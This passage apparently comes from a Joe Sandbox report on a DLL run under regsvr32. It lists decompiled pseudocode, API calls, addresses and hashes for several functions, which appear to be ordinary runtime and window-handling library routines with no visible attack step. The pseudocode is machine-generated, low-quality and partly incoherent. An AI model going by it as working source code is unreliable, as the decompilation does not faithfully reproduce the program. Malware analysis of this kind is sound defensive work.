                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003D060 Relevance: 7.5, APIs: 5, Instructions: 42threadCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 30%
                                                                              			E1003D060(long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, void* __rsi, void* __rbp, void* __r8, void* __r12, long long _a24, long long _a32) {
				long _t8;
				long* _t23;
				long* _t32;

				_t35 = __rsi;
				_t33 = __rdi;
				_t23 = __rax;
				_a24 = __rbx;
				_a32 = __rdi;
				_t8 = GetLastError();
				__imp__FlsGetValue();
				_t26 = __rax;
				if(__rax == 0) {
					_t8 = E1003D420(__rax, __rax, __rcx, __rdx, __rdi, __rsi, __rbp, __r12);
					_t26 = _t23;
					if(_t23 != 0) {
						_t32 = _t23;
						__imp__FlsSetValue();
						if(_t8 == 0) {
							_t8 = E10039620(_t23, _t26);
						} else {
							E1003CEB0(_t23, _t26, _t26, _t32, _t33, _t35);
							_t8 = GetCurrentThreadId();
							_t26[2] = 0xffffffff;
							 *_t26 = _t8;
						}
					}
				}
				SetLastError();
				if(_t26 == 0) {
					E1003B310();
				}
				return _t8;
			}






                                                                              0x1003d060
                                                                              0x1003d060
                                                                              0x1003d060
                                                                              0x1003d064
                                                                              0x1003d069
                                                                              0x1003d06e
                                                                              0x1003d07c
                                                                              0x1003d085
                                                                              0x1003d088
                                                                              0x1003d092
                                                                              0x1003d09a
                                                                              0x1003d09d
                                                                              0x1003d0a5
                                                                              0x1003d0a8
                                                                              0x1003d0b0
                                                                              0x1003d0d1
                                                                              0x1003d0b2
                                                                              0x1003d0b7
                                                                              0x1003d0bc
                                                                              0x1003d0c2
                                                                              0x1003d0ca
                                                                              0x1003d0ca
                                                                              0x1003d0b0
                                                                              0x1003d09d
                                                                              0x1003d0da
                                                                              0x1003d0e8
                                                                              0x1003d0ed
                                                                              0x1003d0ed
                                                                              0x1003d0fe

                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,?,?,10049A32,?,?,?,?,?,?,?,?,1004809E), ref: 1003D06E
                                                                              • FlsGetValue.KERNEL32(?,?,?,?,10049A32,?,?,?,?,?,?,?,?,1004809E), ref: 1003D07C
                                                                              • SetLastError.KERNEL32(?,?,?,?,10049A32,?,?,?,?,?,?,?,?,1004809E), ref: 1003D0DA
                                                                                • Part of subcall function 1003D420: Sleep.KERNEL32(?,?,?,?,1003CFF7,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003D470
                                                                              • FlsSetValue.KERNEL32(?,?,?,?,10049A32,?,?,?,?,?,?,?,?,1004809E), ref: 1003D0A8
                                                                                • Part of subcall function 1003CEB0: GetModuleHandleA.KERNEL32(?,?,?,?,1003D01C,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003CED0
                                                                                • Part of subcall function 1003CEB0: GetProcAddress.KERNEL32(?,?,?,?,1003D01C,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003CEFD
                                                                                • Part of subcall function 1003CEB0: GetProcAddress.KERNEL32(?,?,?,?,1003D01C,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003CF14
                                                                              • GetCurrentThreadId.KERNEL32(?,?,?,?,10049A32,?,?,?,?,?,?,?,?,1004809E), ref: 1003D0BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProcValue$CurrentHandleModuleSleepThread
                                                                              • String ID:
                                                                              • API String ID: 1834866065-0
                                                                              • Opcode ID: 037af0dd4dfa61dac436f7dc0cef80ecd4491f3c04da4a44d3db7e8d2af600a1
                                                                              • Instruction ID: 33a3cc19d5a7afc528b7084b24114cd677823dac05a22cd40515e889cc65cb0d
                                                                              • Opcode Fuzzy Hash: 037af0dd4dfa61dac436f7dc0cef80ecd4491f3c04da4a44d3db7e8d2af600a1
                                                                              • Instruction Fuzzy Hash: B20184303017008ADB0AEF22F8443AD73A2F78DB95F594629DA594B3A4DF7CD446C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001D6EC Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Message$CapturePost$PeekRelease
                                                                              • String ID:
                                                                              • API String ID: 1125932295-0
                                                                              • Opcode ID: d3e13d85af5b509117cabdc05fecfc704272ac6c526a0e5f5c2a85bdaacbef84
                                                                              • Instruction ID: 0c4a94bc8a6dac43d0f8172138c37487721f043cf5ad68cdeb1b0ff1093f34ae
                                                                              • Opcode Fuzzy Hash: d3e13d85af5b509117cabdc05fecfc704272ac6c526a0e5f5c2a85bdaacbef84
                                                                              • Instruction Fuzzy Hash: 88014F35716581C3F712AF65EC69B9A37A0FB98B8CF521025CE490BB94EF7AC4958B00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003CFC0 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 27%
                                                                              			E1003CFC0(long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, void* __rsi, void* __rbp, void* __r8, void* __r12, long long _a24, long long _a32) {
				long _t7;
				long* _t20;
				long* _t29;

				_t32 = __rsi;
				_t30 = __rdi;
				_t20 = __rax;
				_a24 = __rbx;
				_a32 = __rdi;
				_t7 = GetLastError();
				__imp__FlsGetValue();
				_t23 = __rax;
				if(__rax == 0) {
					_t7 = E1003D420(__rax, __rax, __rcx, __rdx, __rdi, __rsi, __rbp, __r12);
					_t23 = _t20;
					if(_t20 != 0) {
						_t29 = _t20;
						__imp__FlsSetValue();
						if(_t7 == 0) {
							_t7 = E10039620(_t20, _t23);
						} else {
							E1003CEB0(_t20, _t23, _t23, _t29, _t30, _t32);
							_t7 = GetCurrentThreadId();
							_t23[2] = 0xffffffff;
							 *_t23 = _t7;
						}
					}
				}
				SetLastError();
				return _t7;
			}






                                                                              0x1003cfc0
                                                                              0x1003cfc0
                                                                              0x1003cfc0
                                                                              0x1003cfc4
                                                                              0x1003cfc9
                                                                              0x1003cfce
                                                                              0x1003cfdc
                                                                              0x1003cfe5
                                                                              0x1003cfe8
                                                                              0x1003cff2
                                                                              0x1003cffa
                                                                              0x1003cffd
                                                                              0x1003d005
                                                                              0x1003d008
                                                                              0x1003d010
                                                                              0x1003d031
                                                                              0x1003d012
                                                                              0x1003d017
                                                                              0x1003d01c
                                                                              0x1003d022
                                                                              0x1003d02a
                                                                              0x1003d02a
                                                                              0x1003d010
                                                                              0x1003cffd
                                                                              0x1003d03a
                                                                              0x1003d051

                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003CFCE
                                                                              • FlsGetValue.KERNEL32(?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003CFDC
                                                                              • SetLastError.KERNEL32(?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003D03A
                                                                                • Part of subcall function 1003D420: Sleep.KERNEL32(?,?,?,?,1003CFF7,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003D470
                                                                              • FlsSetValue.KERNEL32(?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003D008
                                                                                • Part of subcall function 1003CEB0: GetModuleHandleA.KERNEL32(?,?,?,?,1003D01C,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003CED0
                                                                                • Part of subcall function 1003CEB0: GetProcAddress.KERNEL32(?,?,?,?,1003D01C,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003CEFD
                                                                                • Part of subcall function 1003CEB0: GetProcAddress.KERNEL32(?,?,?,?,1003D01C,?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003CF14
                                                                              • GetCurrentThreadId.KERNEL32(?,?,?,?,1003AF49,?,?,?,?,10039645), ref: 1003D01C
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProcValue$CurrentHandleModuleSleepThread
                                                                              • String ID:
                                                                              • API String ID: 1834866065-0
                                                                              • Opcode ID: 3e89c90b89e02bc86f9d86f46c0f3ca59584de5b2f6f4722afd3cca3457834c9
                                                                              • Instruction ID: 6d5e8c2e9f5840f7a4224cc98f0e7859fbd063636d743aacf749990de50bcec7
                                                                              • Opcode Fuzzy Hash: 3e89c90b89e02bc86f9d86f46c0f3ca59584de5b2f6f4722afd3cca3457834c9
                                                                              • Instruction Fuzzy Hash: 130171343017408ADB0AEF22B8443A873A1F78EBE5F994629DA9947394DF7CD446C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001FE74 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 18%
                                                                              			E1001FE74(void* __edx, void* __rcx, char* __rdx, void* __r8, long long* __r9) {
				signed int _v56;
				char _v568;
				long long _v576;
				char _v584;
				long long _v592;
				long long _v600;
				intOrPtr _v608;
				void* _v616;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t47;
				void* _t48;
				void* _t74;
				long long* _t80;
				signed long long _t92;
				signed long long _t93;
				void* _t94;
				signed long long _t95;
				void* _t97;
				void* _t99;
				signed long long _t100;
				intOrPtr* _t110;
				intOrPtr* _t113;
				void* _t114;
				long long* _t116;
				long long* _t122;
				signed long long _t124;

				_t122 = __r9;
				_t118 = __r8;
				_t108 = __rdx;
				_t99 = __rcx;
				_t74 = __edx;
				_t117 =  &_v616;
				_v576 = 0xfffffffe;
				_t92 =  *0x1006f4c8; // 0x6f13091946cb
				_t93 = _t92 ^  &_v616;
				_v56 = _t93;
				_t116 = __r9;
				_t114 = __r8;
				if((0 | __r8 != 0x00000000) == 0) {
					E10016544();
					asm("int3");
				}
				_t80 = _t122;
				_t45 = 0 | _t80 == 0x00000000;
				if(_t80 == 0) {
					_t45 = E10016544();
					asm("int3");
				}
				E10029130(_t45);
				_t124 = _t93;
				if((0 | _t93 != 0x00000000) == 0) {
					E10009538(0x80004005, _t74, _t93, _t97, _t99, _t108, _t114, _t118, _t122, _t124);
					asm("int3");
				}
				_t94 =  *_t93;
				_t100 = _t124;
				_t47 =  *((intOrPtr*)(_t94 + 0x18))();
				_t10 = _t94 + 0x18; // 0x18
				_t115 = _t10;
				_v584 = _t10;
				_t95 =  *((intOrPtr*)(_t114 + 8));
				if( *((intOrPtr*)(_t114 + 0x10)) != 0xfffffdf8 || ( *(_t114 + 0x78) & 0x00000001) == 0) {
					if( *((intOrPtr*)(_t114 + 0x10)) == 0xfffffdee && ( *(_t114 + 0xc8) & 0x00000001) != 0) {
						goto L10;
					}
				} else {
					L10:
					_t100 = _t95;
					_t47 = GetDlgCtrlID(??) & 0x0000ffff;
					_t115 = _v584;
				}
				if(_t95 == 0) {
					L17:
					if( *((intOrPtr*)(_t114 + 0x10)) != 0xfffffdf8) {
						_t48 = E10038D40(_t95, _t114 + 0x20, _t108, _t115, 0xffffffff);
						if(_t48 != 0) {
							if(_t48 == 0xc) {
								L26:
								E100164FC();
								asm("int3");
							} else {
								if(_t48 == 0x16 || _t48 == 0x22) {
									L25:
									E10016544();
									asm("int3");
									goto L26;
								} else {
									if(_t48 != 0x50) {
										E10016544();
										asm("int3");
										goto L25;
									}
								}
							}
						}
					} else {
						 *0x10070de0();
						_v592 = 0;
						_v600 = 0;
						_v608 = 0x50;
						_v616 = _t114 + 0x20;
						r9d = 0xffffffff;
						WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
					}
					 *_t116 = 0;
					_v600 = 0x213;
					_v608 = 0;
					_v616 = 0;
					r9d = 0;
					r8d = 0;
					SetWindowPos(??, ??, ??, ??, ??, ??, ??);
					_t110 = _v584 + 0xffffffe8;
					asm("lock xadd [edx+0x10], ecx");
					_t71 = 0x1fffffffe;
					if(0xffffffff <= 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t110)) + 8))();
					}
				} else {
					r8d = 0x100;
					_t71 = _t47;
					if(E10028F14(0xfffffdf8, _t47, _t74, _t95, _t97, _t100,  &_v568, _t114, _t115, _t118, _t122, _t124) != 0) {
						r9w = 0xa;
						r8d = 1;
						_t108 =  &_v568;
						E10028FF4(_t95, _t97,  &_v584,  &_v568, _t114, _t115, _t118, _t124);
						_t115 = _v584;
						goto L17;
					} else {
						_t113 = _v584 + 0xffffffe8;
						asm("lock xadd [edx+0x10], eax");
						if(0x1fffffffe <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t113)) + 8))();
						}
					}
				}
				return E10038D20(_t71, _v56 ^ _t117);
			}
































                                                                              0x1001fe74
                                                                              0x1001fe74
                                                                              0x1001fe74
                                                                              0x1001fe74
                                                                              0x1001fe74
                                                                              0x1001fe79
                                                                              0x1001fe80
                                                                              0x1001fe89
                                                                              0x1001fe90
                                                                              0x1001fe93
                                                                              0x1001fe9b
                                                                              0x1001fe9e
                                                                              0x1001feab
                                                                              0x1001fead
                                                                              0x1001feb2
                                                                              0x1001feb2
                                                                              0x1001feb5
                                                                              0x1001feb8
                                                                              0x1001febd
                                                                              0x1001febf
                                                                              0x1001fec4
                                                                              0x1001fec4
                                                                              0x1001fec5
                                                                              0x1001feca
                                                                              0x1001fed7
                                                                              0x1001fede
                                                                              0x1001fee3
                                                                              0x1001fee3
                                                                              0x1001fee4
                                                                              0x1001fee7
                                                                              0x1001feea
                                                                              0x1001feed
                                                                              0x1001feed
                                                                              0x1001fef1
                                                                              0x1001fef6
                                                                              0x1001ff02
                                                                              0x1001ff11
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001ff1c
                                                                              0x1001ff1c
                                                                              0x1001ff1c
                                                                              0x1001ff25
                                                                              0x1001ff28
                                                                              0x1001ff28
                                                                              0x1001ff30
                                                                              0x1001ff91
                                                                              0x1001ff94
                                                                              0x1001ffe6
                                                                              0x1001ffed
                                                                              0x1001fff2
                                                                              0x1002000f
                                                                              0x1002000f
                                                                              0x10020014
                                                                              0x1001fff4
                                                                              0x1001fff7
                                                                              0x10020009
                                                                              0x10020009
                                                                              0x1002000e
                                                                              0x00000000
                                                                              0x1001fffe
                                                                              0x10020001
                                                                              0x10020003
                                                                              0x10020008
                                                                              0x00000000
                                                                              0x10020008
                                                                              0x10020001
                                                                              0x1001fff7
                                                                              0x1001fff2
                                                                              0x1001ff96
                                                                              0x1001ff9a
                                                                              0x1001ffa0
                                                                              0x1001ffa9
                                                                              0x1001ffb2
                                                                              0x1001ffba
                                                                              0x1001ffbf
                                                                              0x1001ffcc
                                                                              0x1001ffcc
                                                                              0x10020015
                                                                              0x1002001d
                                                                              0x10020025
                                                                              0x1002002d
                                                                              0x10020035
                                                                              0x10020038
                                                                              0x10020040
                                                                              0x1002004c
                                                                              0x10020055
                                                                              0x1002005a
                                                                              0x1002005f
                                                                              0x10020067
                                                                              0x10020067
                                                                              0x1001ff32
                                                                              0x1001ff32
                                                                              0x1001ff3d
                                                                              0x1001ff46
                                                                              0x1001ff72
                                                                              0x1001ff77
                                                                              0x1001ff7d
                                                                              0x1001ff87
                                                                              0x1001ff8c
                                                                              0x00000000
                                                                              0x1001ff48
                                                                              0x1001ff4d
                                                                              0x1001ff56
                                                                              0x1001ff60
                                                                              0x1001ff68
                                                                              0x1001ff68
                                                                              0x1001ff6b
                                                                              0x1001ff46
                                                                              0x1002008b

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharCtrlMultiWideWindow
                                                                              • String ID: P
                                                                              • API String ID: 102189203-3110715001
                                                                              • Opcode ID: f721a1f8b75079e965f6c95d7785bfa5e643f48ae34082c289b0ad34b37b1153
                                                                              • Instruction ID: cb8cb7aaa8ec2d60bd76ed645aa57f3fda39b21edd844f01ae0cc21efe23d70d
                                                                              • Opcode Fuzzy Hash: f721a1f8b75079e965f6c95d7785bfa5e643f48ae34082c289b0ad34b37b1153
                                                                              • Instruction Fuzzy Hash: D851B132600B8583E714CB25E89435E33A1FB85BB4F504329EB798BAE5DF79C895C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100371C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 51%
                                                                              			E100371C0(signed int __ebp, signed long long __rax, void* __rcx, long long __rdx, long long _a16, signed short _a24) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t33;
				void* _t34;
				signed int _t35;
				void* _t37;
				void* _t43;
				signed int _t48;
				signed int _t49;
				void* _t51;
				signed int _t52;
				void* _t55;
				signed long long _t57;
				void* _t59;
				signed long long _t61;
				void* _t62;
				signed int* _t77;
				void* _t78;
				void* _t79;
				signed long long _t89;
				signed long long _t90;

				_t57 = __rax;
				_t52 = __ebp;
				_a24 = r8w;
				_a16 = __rdx;
				_t78 = __rcx;
				if( *((intOrPtr*)(__rcx + 8)) != 0) {
					GlobalLock();
					r12d = 0;
					_t77 = __rax;
					r12b =  *((intOrPtr*)(__rax + 2)) == 0xffff;
					if( *((intOrPtr*)(__rax + 2)) != 0xffff) {
						_t48 =  *__rax;
					} else {
						_t48 =  *(__rax + 0xc);
					}
					_t49 = _t48 & 0x00000040;
					asm("sbb ebp, ebp");
					_t55 = (_t52 & 0x00000002) + 1 + (_t52 & 0x00000002) + 1;
					if(r12d == 0) {
						 *_t77 =  *_t77 | 0x00000040;
					} else {
						_t77[3] = _t77[3] | 0x00000040;
					}
					if(lstrlenW() >= 0x20) {
						goto L1;
					} else {
						_t10 = _t57 * 2; // 0xb
						r14d = _t79 + _t10 + 2;
						if(r14d < _t55) {
							goto L1;
						} else {
							_t34 = E10036FDC(_t32, _t77);
							_t90 = _t57;
							if(_t49 == 0) {
								_t51 = 0;
							} else {
								_t62 = _t55;
								E10039820(_t34, _t62 + _t57);
								_t14 = _t57 * 2; // 0x2
								_t51 = _t62 + _t14 + 2;
							}
							_t17 = _t90 + 3; // 0x3
							_t59 = r14d;
							_t19 = _t90 + 3; // 0x3
							_t89 = _t51 + _t17 & 0xfffffffc;
							_t61 = _t59 + _t19 & 0xfffffffc;
							if(r12d == 0) {
								_t35 = _t77[2];
							} else {
								_t35 = _t77[4] & 0x0000ffff;
							}
							if(r14d == _t51 || _t35 == 0) {
								L27:
								r14d = r14d - _t55;
								 *_t90 = _a24 & 0x0000ffff;
								_t37 = E10039840(_t61, _t55 + _t90, r14d, _t77, _t78, _t79, _a16, r14d);
								if(_t37 != 0) {
									if(_t37 == 0xc) {
										L34:
										E100164FC();
										asm("int3");
									} else {
										if(_t37 == 0x16 || _t37 == 0x22) {
											L33:
											E10016544();
											asm("int3");
											goto L34;
										} else {
											if(_t37 != 0x50) {
												E10016544();
												asm("int3");
												goto L33;
											}
										}
									}
								}
								 *((intOrPtr*)(_t78 + 8)) =  *((intOrPtr*)(_t78 + 8)) + _t49 - r13d;
								GlobalUnlock(??);
								 *((intOrPtr*)(_t78 + 0xc)) = 0;
								_t33 = 1;
							} else {
								_t76 = _t59 - _t89 + _t77;
								if(_t59 - _t89 + _t77 > _t59) {
									goto L1;
								} else {
									_t43 = E10039840(_t61, _t61, _t76, _t77, _t78, _t79, _t89, _t76);
									if(_t43 != 0) {
										if(_t43 == 0xc) {
											L26:
											E100164FC();
											asm("int3");
										} else {
											if(_t43 == 0x16 || _t43 == 0x22) {
												L25:
												E10016544();
												asm("int3");
												goto L26;
											} else {
												if(_t43 != 0x50) {
													E10016544();
													asm("int3");
													goto L25;
												}
											}
										}
									}
									goto L27;
								}
							}
						}
					}
				} else {
					L1:
					_t33 = 0;
				}
				return _t33;
			}


























                                                                              0x100371c0
                                                                              0x100371c0
                                                                              0x100371c0
                                                                              0x100371c6
                                                                              0x100371e2
                                                                              0x100371e5
                                                                              0x100371f1
                                                                              0x100371f7
                                                                              0x100371fa
                                                                              0x10037205
                                                                              0x1003720d
                                                                              0x10037214
                                                                              0x1003720f
                                                                              0x1003720f
                                                                              0x1003720f
                                                                              0x10037216
                                                                              0x1003721e
                                                                              0x10037226
                                                                              0x1003722b
                                                                              0x10037233
                                                                              0x1003722d
                                                                              0x1003722d
                                                                              0x1003722d
                                                                              0x10037242
                                                                              0x00000000
                                                                              0x10037244
                                                                              0x10037244
                                                                              0x10037244
                                                                              0x1003724c
                                                                              0x00000000
                                                                              0x1003724e
                                                                              0x10037251
                                                                              0x10037258
                                                                              0x1003725b
                                                                              0x1003726f
                                                                              0x1003725d
                                                                              0x1003725d
                                                                              0x10037264
                                                                              0x10037269
                                                                              0x10037269
                                                                              0x10037269
                                                                              0x10037274
                                                                              0x10037279
                                                                              0x1003727c
                                                                              0x10037281
                                                                              0x10037285
                                                                              0x1003728c
                                                                              0x10037294
                                                                              0x1003728e
                                                                              0x1003728e
                                                                              0x1003728e
                                                                              0x1003729b
                                                                              0x100372ef
                                                                              0x100372fc
                                                                              0x10037305
                                                                              0x1003730f
                                                                              0x10037316
                                                                              0x1003731b
                                                                              0x10037338
                                                                              0x10037338
                                                                              0x1003733d
                                                                              0x1003731d
                                                                              0x10037320
                                                                              0x10037332
                                                                              0x10037332
                                                                              0x10037337
                                                                              0x00000000
                                                                              0x10037327
                                                                              0x1003732a
                                                                              0x1003732c
                                                                              0x10037331
                                                                              0x00000000
                                                                              0x10037331
                                                                              0x1003732a
                                                                              0x10037320
                                                                              0x1003731b
                                                                              0x10037344
                                                                              0x10037347
                                                                              0x1003734d
                                                                              0x10037354
                                                                              0x100372a2
                                                                              0x100372ab
                                                                              0x100372b1
                                                                              0x00000000
                                                                              0x100372b7
                                                                              0x100372c0
                                                                              0x100372c7
                                                                              0x100372cc
                                                                              0x100372e9
                                                                              0x100372e9
                                                                              0x100372ee
                                                                              0x100372ce
                                                                              0x100372d1
                                                                              0x100372e3
                                                                              0x100372e3
                                                                              0x100372e8
                                                                              0x00000000
                                                                              0x100372d8
                                                                              0x100372db
                                                                              0x100372dd
                                                                              0x100372e2
                                                                              0x00000000
                                                                              0x100372e2
                                                                              0x100372db
                                                                              0x100372d1
                                                                              0x100372cc
                                                                              0x00000000
                                                                              0x100372c7
                                                                              0x100372b1
                                                                              0x1003729b
                                                                              0x1003724c
                                                                              0x100371e7
                                                                              0x100371e7
                                                                              0x100371e7
                                                                              0x100371e7
                                                                              0x10037369

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalLocklstrlen
                                                                              • String ID: System
                                                                              • API String ID: 1144527523-3470857405
                                                                              • Opcode ID: 24cb40cf6d63245de0edc2d822f200743c7abced7657be3ca0bdb85543d20d79
                                                                              • Instruction ID: 39ed9e6b5a81e2e633be5846f9b7ad8cf7a0606ae7a9f8b372f2ef36328e14f8
                                                                              • Opcode Fuzzy Hash: 24cb40cf6d63245de0edc2d822f200743c7abced7657be3ca0bdb85543d20d79
                                                                              • Instruction Fuzzy Hash: 5C411B662012418EEB7ACB65DD8077F7260FB097D6F518A15EF6A8E990EF34D9C4C301
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10021630 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 69%
                                                                              			E10021630(void* __edx, void* __rcx, void* __rdx, void* __rsi, void* __rbp, void* __r8, void* __r9, void* __r12, void* __r13) {
				signed int _v40;
				char _v104;
				char _v168;
				long long _v176;
				char _v184;
				void* __rbx;
				void* __rdi;
				void* _t32;
				void* _t35;
				void* _t36;
				void* _t51;
				signed long long _t62;
				signed long long _t69;
				signed long long _t70;
				void* _t71;
				long long _t72;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t102;
				void* _t110;
				void* _t111;
				signed long long _t113;
				signed long long _t116;
				void* _t117;
				void* _t118;

				_t118 = __r13;
				_t117 = __r12;
				_t115 = __r9;
				_t114 = __r8;
				_t111 = __rsi;
				_v176 = 0xfffffffe;
				_t69 =  *0x1006f4c8; // 0x6f13091946cb
				_t70 = _t69 ^ _t113;
				_v40 = _t70;
				_t74 = __rdx;
				_t110 = __rcx;
				E10029130(_t32);
				_t116 = _t70;
				_t62 = _t70;
				_t58 = 0 | _t62 == 0x00000000;
				if(_t62 == 0) {
					_t58 = 0x80004005;
					E10009538(0x80004005, __edx, _t70, __rdx, __rcx, __rdx, __rcx, __r8, __r9, _t116);
					asm("int3");
				}
				_t71 =  *_t70;
				 *((intOrPtr*)(_t71 + 0x18))();
				_t72 = _t71 + 0x18;
				_v184 = _t72;
				_t35 = E10016020(_t110);
				asm("bt eax, 0xe");
				if(_t72 >= 0) {
					r8d =  *((intOrPtr*)( *((intOrPtr*)(_t110 + 0x158)) - 0x10));
					_t36 = E1000B5C0( &_v184,  *((intOrPtr*)(_t110 + 0x158)), _t110, _t111, _t114, _t116, _t117, _t118);
					if(_t74 != 0) {
						r8d = E10039820(_t36, 0x10059e58);
						r8d = E10039820(E1000B5C0( &_v184, 0x10059e58, _t110, _t111, _t114, _t116, _t117, _t118), _t74);
						E1000B5C0( &_v184, _t74, _t110, _t111, _t114, _t116, _t117, _t118);
